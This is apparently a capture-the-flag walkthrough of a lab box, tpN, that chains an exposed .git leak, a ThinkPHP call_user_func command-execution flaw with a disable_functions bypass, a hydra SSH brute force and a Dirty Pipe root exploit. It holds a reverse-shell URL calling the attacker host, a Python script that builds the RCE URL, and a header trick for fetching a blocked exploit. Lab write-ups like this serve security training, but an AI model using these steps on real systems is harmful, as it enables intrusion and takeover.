tpN (a box shared by a group member)

Contents:
  1. Information gathering
  2. Git leak
  3. Code audit
  4. SSH brute force
  5. DirtyPipe privilege escalation

Information gathering

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:10 (Unknown: locally administered)
192.168.31.2 08:00:27:9b:1b:f6 PCS Systemtechnik GmbH
192.168.31.254 08:00:27:b6:dd:51 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.436 seconds (105.09 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.254 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 01:56 EDT
Nmap scan report for change.dsz (192.168.31.254)
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 08:00:27:B6:DD:51 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.21 seconds
```

Port 8080 serves a ThinkPHP 8.0.13 application (nmap's "http-proxy" is only the default service name for that port number, not a fingerprint; the framework and version are identified from the web application itself).

Git leak

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# dirsearch -u "http://192.168.31.254:8080/"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/tmp/reports/http_192.168.31.254_8080/__25-07-25_01-56-44.txt

Target: http://192.168.31.254:8080/

[01:56:44] Starting:
[01:56:44] 403 - 281B - /%3f/
[01:56:46] 301 - 322B - /.git -> http://192.168.31.254:8080/.git/
[01:56:46] 200 - 414B - /.git/branches/
[01:56:46] 200 - 605B - /.git/
[01:56:46] 200 - 73B - /.git/description
[01:56:46] 200 - 263B - /.git/config
[01:56:46] 200 - 675B - /.git/hooks/
[01:56:46] 200 - 21B - /.git/HEAD
[01:56:46] 200 - 7KB - /.git/index
[01:56:46] 200 - 461B - /.git/info/
[01:56:46] 200 - 179B - /.git/logs/HEAD
[01:56:46] 200 - 483B - /.git/logs/
[01:56:46] 200 - 240B - /.git/info/exclude
[01:56:46] 301 - 332B - /.git/logs/refs -> http://192.168.31.254:8080/.git/logs/refs/
[01:56:46] 301 - 340B - /.git/logs/refs/remotes -> http://192.168.31.254:8080/.git/logs/refs/remotes/
[01:56:46] 301 - 347B - /.git/logs/refs/remotes/origin -> http://192.168.31.254:8080/.git/logs/refs/remotes/origin/
[01:56:46] 301 - 338B - /.git/logs/refs/heads -> http://192.168.31.254:8080/.git/logs/refs/heads/
[01:56:46] 200 - 179B - /.git/logs/refs/remotes/origin/HEAD
[01:56:46] 200 - 112B - /.git/packed-refs
[01:56:46] 301 - 333B - /.git/refs/heads -> http://192.168.31.254:8080/.git/refs/heads/
[01:56:46] 200 - 467B - /.git/objects/
[01:56:46] 301 - 335B - /.git/refs/remotes -> http://192.168.31.254:8080/.git/refs/remotes/
[01:56:46] 301 - 342B - /.git/refs/remotes/origin -> http://192.168.31.254:8080/.git/refs/remotes/origin/
[01:56:46] 200 - 30B - /.git/refs/remotes/origin/HEAD
[01:56:46] 200 - 475B - /.git/refs/
[01:56:46] 301 - 332B - /.git/refs/tags -> http://192.168.31.254:8080/.git/refs/tags/
[01:56:47] 200 - 115B - /.gitignore
[01:56:47] 404 - 278B - /.gitignore/
```

dirsearch finds an exposed .git directory; the 200 responses on /.git/, /.git/objects/ and /.git/refs/ suggest directory listing is enabled for it as well.

Use GitDump to download the leaked repository, then run git checkout -- . to rebuild the working tree:

```
┌──(root㉿kali)-[~/…/gitTools-v0.0.1/Dumper/GitDump/output]
└─# git checkout -- .
error: unable to read sha1 file of .gitignore (5054a67e564790fb2303e60414d251eef5847227)
error: unable to read sha1 file of .htaccess (e69de29bb2d1d6434b8b29ae775ad8c2e48c5391)
error: unable to read sha1 file of .travis.yml (36f7b6f90dafe374d0eca306886df83f09ff13a9)
error: unable to read sha1 file of LICENSE.txt (8d94897d94b3c8db8400259fec20d33a4f252827)
error: unable to read sha1 file of README.md (05c7b838fb24a9dd309e77d3428c7cb06495f3a1)
error: unable to read sha1 file of app/.htaccess (3418e55a68383c1cbc687c52a2994d1e8ed83800)
error: unable to read sha1 file of app/AppService.php (96556e88e2abe4becd210e99166be1ad855c5cf5)
error: unable to read sha1 file of app/BaseController.php (025ed07bf114971b4218d92061fb35cce94d3a79)
...
```

The result is a tree of directories with no PHP files: the index still lists every path, but the object files behind them were not recovered, so checkout cannot restore any contents. Download again and look at the config file instead:

```
┌──(root㉿kali)-[~/…/Dumper/GitDump/output/.git]
└─# cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/LSP1025923/thinkphp.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
```

The config leaks the GitHub URL of the source (the author's own repository), so clone it and read the code from there.
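As an added example (not part of GitDump, git, or this box), the following Python shows what a dumped .git directory gives you even when the objects are missing: the remote URL from config, the commit HEAD points at, and exactly why `git checkout -- .` prints "unable to read sha1 file" for every path in the index. The HEAD, config and packed-refs text is constructed to mirror the page; the commit id is a placeholder, and a dict stands in for the .git/objects/ tree on disk.

```python
"""Triage a dumped .git directory: remote URL, HEAD commit, and the reason
`git checkout -- .` fails with "unable to read sha1 file".

Added example for this writeup; not part of gitTools/GitDump or git.
"""
import hashlib
import re
import zlib
from typing import Dict, List, Optional, Tuple

# Constructed samples (the config matches the leaked .git/config on the page;
# SAMPLE_COMMIT is a placeholder, not the real commit id).
SAMPLE_HEAD = "ref: refs/heads/main\n"
SAMPLE_CONFIG = """[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[remote "origin"]
    url = https://github.com/LSP1025923/thinkphp.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
    remote = origin
    merge = refs/heads/main
"""
SAMPLE_COMMIT = "a" * 40
SAMPLE_PACKED_REFS = (
    "# pack-refs with: peeled fully-peeled sorted\n"
    f"{SAMPLE_COMMIT} refs/remotes/origin/main\n"
)


def parse_git_config(text: str) -> Dict[str, str]:
    """Flatten .git/config into {'remote.origin.url': ..., 'branch.main.merge': ...}."""
    out: Dict[str, str] = {}
    prefix = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r'\[(\w+)(?:\s+"([^"]*)")?\]', line)
        if m:
            prefix = m.group(1) + (f".{m.group(2)}" if m.group(2) else "")
            continue
        key, _, value = line.partition("=")
        out[f"{prefix}.{key.strip()}"] = value.strip()
    return out


def resolve_head(head: str, loose_refs: Dict[str, str], packed_refs: str) -> Optional[str]:
    """Follow HEAD -> ref -> commit id: loose refs first, then packed-refs."""
    head = head.strip()
    if not head.startswith("ref: "):
        return head if re.fullmatch(r"[0-9a-f]{40}", head) else None  # detached HEAD
    ref = head[len("ref: "):]
    if ref in loose_refs:
        return loose_refs[ref].strip()
    for line in packed_refs.splitlines():
        if line.startswith(("#", "^")):
            continue
        parts = line.split()
        if len(parts) == 2 and parts[1] == ref:
            return parts[0]
    return None


def object_path(sha: str) -> str:
    """Loose objects live at .git/objects/<first 2 hex>/<remaining 38 hex>."""
    return f".git/objects/{sha[:2]}/{sha[2:]}"


def git_object_sha(kind: str, body: bytes) -> str:
    """Object id is SHA-1 over "<type> <size>NUL<body>", the same bytes zlib wraps."""
    return hashlib.sha1(f"{kind} {len(body)}\0".encode() + body).hexdigest()


def make_loose_object(kind: str, body: bytes) -> Tuple[str, bytes]:
    """Build a loose object exactly as git stores it on disk."""
    raw = f"{kind} {len(body)}\0".encode() + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def read_loose_object(store: Dict[str, bytes], sha: str) -> Optional[Tuple[str, bytes]]:
    """Return (type, body), or None when the object is missing or corrupt."""
    data = store.get(object_path(sha))
    if data is None:
        return None
    try:
        raw = zlib.decompress(data)
    except zlib.error:
        return None
    header, _, body = raw.partition(b"\0")
    kind, size = header.decode().split()
    if int(size) != len(body) or hashlib.sha1(raw).hexdigest() != sha:
        return None
    return kind, body


def checkout_status(index: Dict[str, str], store: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Mirror `git checkout -- .`: each index entry whose blob is absent fails."""
    result = []
    for path, sha in sorted(index.items()):
        ok = read_loose_object(store, sha) is not None
        result.append((path, "ok" if ok else "unable to read sha1 file"))
    return result
```

The second error line on the page, `.htaccess (e69de29b...)`, is the id of the empty blob, so even a zero-byte file fails when its object is absent; what the dumper actually saved was the index (paths and ids) plus config, not the content. The config alone is enough here because it names the upstream remote.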

Code audit

In the admin controller, the hello method calls call_user_func on request-controlled values, which is the sink to exploit.

The controller is behind an authentication check, but the Token method in the index controller hands out an admin session.

First visit http://192.168.31.254:8080/index/token/token

Enter admin to obtain the session, then build the URL following ThinkPHP's routing conventions. Note that disable_functions is set; the earlier directory scan also turned up phpinfo.php, which lists:

```
system,shell_exec,proc_open,pcntl_exec,dl
```

passthru is not banned, so visit http://192.168.31.254:8080/admin/admin/hello/a/id/b/passthru

This still returns an error page.

config/app.php contains an application mapping that maps admin to think, so the URL has to use the mapped name.

So visit http://192.168.31.254:8080/think/admin/hello/a/id/b/passthru

That executes; now get a reverse shell back to a listener on 192.168.31.129:4444:

```
http://192.168.31.254:8080/think/admin/hello/a/busybox%20nc%20192.168.31.129%204444%20-e%20bash/b/passthru
```
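The three things that had to line up for that request (an exec function left open by disable_functions, the app_map alias, and the /param/value path encoding) are worth having as a small script rather than rediscovering by trial and error. This is an added example for the writeup, not code from the target or from ThinkPHP. Assumptions: the sink is `call_user_func($b, $a)` reached through route parameters a and b (the page only says hello() uses call_user_func), and config/app.php carries `'app_map' => ['think' => 'admin']` (the page says admin is mapped to think). The disable_functions string is the one phpinfo.php showed.

```python
"""Build the call_user_func RCE request for the tpN ThinkPHP app.

Added example for this writeup; not code from the box or from ThinkPHP.
"""
from typing import Dict, Optional, Set
from urllib.parse import quote

# Preference order: passthru writes raw output straight into the response,
# exec only returns the last line, popen/proc_open need extra steps to read.
EXEC_SINKS = ("system", "passthru", "exec", "shell_exec", "popen", "proc_open", "pcntl_exec")

# Value shown by phpinfo.php on the target (copied from the page).
PHPINFO_DISABLE_FUNCTIONS = "system,shell_exec,proc_open,pcntl_exec,dl"


def parse_disable_functions(value: str) -> Set[str]:
    """php.ini disable_functions is a comma (sometimes space) separated list."""
    return {f.strip() for f in value.replace(" ", ",").split(",") if f.strip()}


def usable_exec_sink(disabled: Set[str]) -> Optional[str]:
    """First command-execution function that is not disabled, or None."""
    for name in EXEC_SINKS:
        if name not in disabled:
            return name
    return None


def url_app_name(app_map: Dict[str, str], app_dir: str) -> str:
    """app_map is {name_in_url: app_directory}. Once a mapping exists the
    directory name itself no longer routes, so the URL must use the alias."""
    for alias, target in app_map.items():
        if target == app_dir:
            return alias
    return app_dir


def build_rce_url(base: str, app_map: Dict[str, str], app_dir: str, controller: str,
                  action: str, cmd: str, disabled: Set[str]) -> Optional[str]:
    """/<app>/<controller>/<action>/a/<cmd>/b/<func> -> call_user_func(func, cmd)."""
    sink = usable_exec_sink(disabled)
    if sink is None:
        return None  # every exec primitive blocked; a different bypass is needed
    segments = [url_app_name(app_map, app_dir), controller, action,
                "a", quote(cmd, safe=""), "b", sink]
    return base.rstrip("/") + "/" + "/".join(segments)


if __name__ == "__main__":
    blocked = parse_disable_functions(PHPINFO_DISABLE_FUNCTIONS)
    print(build_rce_url("http://192.168.31.254:8080", {"think": "admin"}, "admin",
                        "admin", "hello", "busybox nc 192.168.31.129 4444 -e bash", blocked))
```

`quote(cmd, safe="")` leaves letters, digits, `.`, `-`, `_` and `~` alone and encodes spaces as %20, which reproduces the reverse-shell URL above byte for byte. A command containing `/` would become %2F, which web servers may decode back into a path separator before ThinkPHP splits the route; keep commands slash-free (the busybox nc one is) or pass them as ?a=...&b=... if the controller reads its parameters with a method that also accepts query strings.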

SSH brute force

welcome's home directory contains a .pwd file; use it as a wordlist with hydra against welcome's SSH login. The author placed the password at the very end of the list: eecho.

```
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# hydra -l welcome -P ./pwd 192.168.31.254 ssh -vV -I -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
...
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-25 02:19:41
[22][ssh] host: 192.168.31.254 login: welcome password: eecho
```

DirtyPipe privilege escalation

After a long look around the box without finding anything, check for kernel vulnerabilities instead:

```
welcome@tpN:~$ busybox wget 192.168.31.129/les.sh
Connecting to 192.168.31.129 (192.168.31.129:80)
les.sh 100% |*************************************************************************| 90858 0:00:00 ETA
welcome@tpN:~$ chmod +x ./les.sh
welcome@tpN:~$ ./les.sh

Available information:

Kernel version: 5.8.0
Architecture: x86_64
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: N/A

Searching among:

81 kernel space exploits
0 user space exploits

Possible Exploits:

[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops

Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: probable
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
```

LES rates CVE-2021-3490 as probable, but the kernel is 5.8.0, which also sits inside the Dirty Pipe (CVE-2022-0847) window (5.8 up to the fixes in 5.16.11, 5.15.25 and 5.10.102), and Dirty Pipe is the one used here.

PoC (blasty's dirtypipez.c, which uses the pipe bug to overwrite a SUID binary, runs it, then restores the original):

https://haxx.in/files/dirtypipez.c

Fetching it with curl directly returns this instead of the source:

```
┌──(root㉿kali)-[~/Desktop/script]
└─# proxy curl https://haxx.in/files/dirtypipez.c
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 192.168.11.1:7890 ... haxx.in:443 ... OK
dear botnet herder/scriptkiddie:

due to ongoing abuse complaints about bad actors(tm)
leeching exploit code from my domain (haxx.in) directly
to vulnerable hosts I've had to make some adjustments
to my setup. I would strongly suggest you re-host any
exploit code you found on my website, its better for
your own operational security anyway.

thanks for your understanding.

kind regards,
blasty
```

This is because the author added a User-Agent check; with curl, adding -H 'User-Agent: 123' is enough:

```
welcome@tpN:~$ proxy curl https://haxx.in/files/dirtypipez.c -H "User-Agent: 123" -O
welcome@tpN:~$ gcc dirtypipez.c -o dirtypipez
welcome@tpN:~$ ./dirtypipez /bin/su
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# id
uid=0(root) gid=0(root) groups=0(root),1000(welcome)
```
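Since LES did not point at Dirty Pipe here and the decision came from the kernel version alone, this added example (not part of linux-exploit-suggester or of dirtypipez.c) encodes the upstream CVE-2022-0847 window so the check can be repeated on other boxes: introduced in 5.8, fixed in 5.16.11, 5.15.25 and 5.10.102, and absent from 5.17 onward; the 5.x series in between that were already end-of-life never got a fixed release. The release strings in the test are constructed inputs.

```python
"""Check a kernel release string against the Dirty Pipe (CVE-2022-0847) window.

Added example for this writeup; not part of linux-exploit-suggester or dirtypipez.c.
"""
import re
from typing import Optional, Tuple

# 5.<minor> stable series -> first patch release that contains the fix.
FIXED_IN = {16: 11, 15: 25, 10: 102}


def parse_release(release: str) -> Optional[Tuple[int, int, int]]:
    """'5.8.0-63-generic' -> (5, 8, 0); distro suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def in_dirty_pipe_window(release: str) -> Optional[bool]:
    """True if the upstream version is vulnerable, False if not, None if unparsable."""
    parsed = parse_release(release)
    if parsed is None:
        return None
    major, minor, patch = parsed
    if (major, minor) < (5, 8):
        return False          # bug introduced in 5.8
    if (major, minor) >= (5, 17):
        return False          # 5.17 and later shipped with the fix
    fixed = FIXED_IN.get(minor)
    if fixed is None:
        return True           # 5.8, 5.9, 5.11-5.14: no fixed release exists
    return patch < fixed


def triage(release: str) -> str:
    """One-line verdict for the notes, in the spirit of LES output."""
    verdict = in_dirty_pipe_window(release)
    if verdict is None:
        return f"{release}: could not parse kernel version"
    if verdict:
        return (f"{release}: inside CVE-2022-0847 window, try dirtypipez.c "
                "(needs gcc or a prebuilt binary, and a readable SUID target)")
    return f"{release}: outside CVE-2022-0847 window"


if __name__ == "__main__":
    print(triage("5.8.0"))  # the version les.sh reported on tpN
```

Two caveats that the version check cannot see: distribution kernels backport fixes without bumping the version string, so a hit is a reason to run the PoC, not proof; and Dirty Pipe only lets you write into page cache of files you can open for reading, which is why dirtypipez.c targets a world-readable SUID binary such as /bin/su and why the dropped /tmp/sh has to be cleaned up afterwards, as the exploit's own output reminds you.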